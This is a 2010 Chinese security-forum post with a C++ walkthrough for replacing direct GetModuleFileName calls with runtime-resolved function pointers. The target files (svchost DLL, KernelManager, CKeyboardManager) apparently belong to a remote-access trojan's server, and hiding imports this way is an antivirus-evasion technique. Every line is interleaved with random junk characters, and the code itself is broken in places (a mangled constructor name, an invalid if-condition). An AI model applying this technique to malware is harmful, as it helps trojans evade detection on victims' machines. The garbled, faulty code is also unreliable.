标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
: m( S. L1 _& e1 E$ B
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
% R8 A& p s& e
----------------------------------------
8 C( h$ @' Z4 m- D0 \
DTDY.h:
- `4 j3 V2 i# Y0 @
0 n/ t1 w# q& P
#if _MSC_VER>1000
0 W. H/ g9 X" J6 K* z) F' N$ H
#pragma once
$ B% R+ c- \% w2 |( N! \
#endif //_MSC_VER>1000
( C5 y" @- J% ]6 d$ Z% x6 T
#include<windows.h>
% ]4 k0 o/ [) X. A9 D5 }' L7 w
; }* O7 x: m5 ~# `
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
( F0 Y+ x' ^$ V- S% d1 ^
class DTDY
3 a8 _4 E1 v5 ~0 V! o6 J
{
( C) g1 |+ H A0 j2 C
public:
) {' y2 ?6 B+ p% x7 R
DTDY();
+ l8 K/ a5 y$ Q
virtual ~DTDY();
1 r( M; ? J8 N
public:
2 t% h4 D) o/ u
static pGetModuleFileNameA MyGetModuleFileName;
5 f% Z8 ?' \4 O/ l
static BOOL FunInitiallization();
4 T4 d8 s) O% \) ~, L
};
+ ^2 Y) n" W; } W% t# M
#endif
& u3 [ V9 T+ K2 U3 E
----------------------------------------
- O% ~4 ~# F- q
7 o# V# A, h1 h
DTDY.cpp:
! n: N, `! e% a0 i5 l
8 ^- @: k6 h, w3 m. w ^5 K
#include "DTDY.h"
" C! @* z1 S6 P+ R4 ~
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
9 |) r1 \4 @$ h. ?1 a
DTDY:TDY()
! e, n9 U/ Y# f- O) j
{
) ?0 K9 T, l6 w8 @+ b4 K
}
Q d% D" P& l1 [
DTDY::~DTDY()
3 [( z) h) B7 k/ a8 X* v; x
{
- x" g# `4 R7 i$ O0 [+ `# J
}
2 ^ s- h$ `+ p
BOOL DTDY::FunInitiallization()
1 J% ?! h- z9 G2 \: t
{
8 e% G) S6 N2 O. j) O# S4 H# I
HMODULE hModule=LoadLibrary("kernel32.dll");
: J7 ?0 O; U0 k+ v; U/ S
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
e) v( i# J9 f& f
if(!MyGetModuleFileName=) return FALSE;
0 e: o# C* V4 p, w. [3 Y/ `/ A& U
6 `$ w5 R1 ]; c+ H
return TRUE;
4 x) z6 m7 m0 U7 m
}
( O5 o h0 ?4 s# }0 `/ Y
----------------------------------------
# B5 V7 `' a) S: l+ ?' `
svchost.cpp:
% ^& B! s* f+ M5 a. L3 H
7 M# T7 O3 l# o1 c
#include "DTDY.h"
: C: j" }! x% Z$ x. a
: A9 H) O4 [1 g$ Z3 P4 ]
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
" ]" q* {+ @1 ]! S- {* ]
{
$ ^) |# ]4 q2 p4 S- T
switch(ul_reason_for_call)
% Y, k# q2 ^# p! X4 X
{
- n3 {& ^ i# o. B) K5 z
case DLL_PROCESS_ATTACH:
! k8 n: M; z9 U! a1 X# N) H- y$ L
if(!DTDY::FunInitiallization()) return FALSE;
) S2 L! |' f9 k$ A) [. ~1 I
" j. c9 n8 t. P: O/ F; V" x' r
break;
2 d9 g4 V t% ?. g
}
2 ?* q4 @# T7 u( U
}
9 r/ I! d" l3 d2 z# X0 Q. Z: H
& O; T6 h4 d7 s2 P; S1 v- M
- M1 g4 f+ L$ P; |8 C- z
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
9 Q6 t2 k, H# o" I8 _: W
改写为
% l1 g* a/ x0 K3 N, R. ?# r# _' [
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
! _; m( ]8 n" H
----------------------------------------
' [" j- }- v) ^! L' I% d
KernelManager.cpp:
+ J$ j x1 Q0 |# k
" N9 R# \- m' @
#include "../DTDY.h"
7 T {3 }4 {) p- A+ O# G# C
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
0 r& K* H! X6 m& a, [3 {- P! g
改写为
. c( f" O5 x& r& A% q" _1 }0 F
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 T* X y" m1 C* U
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
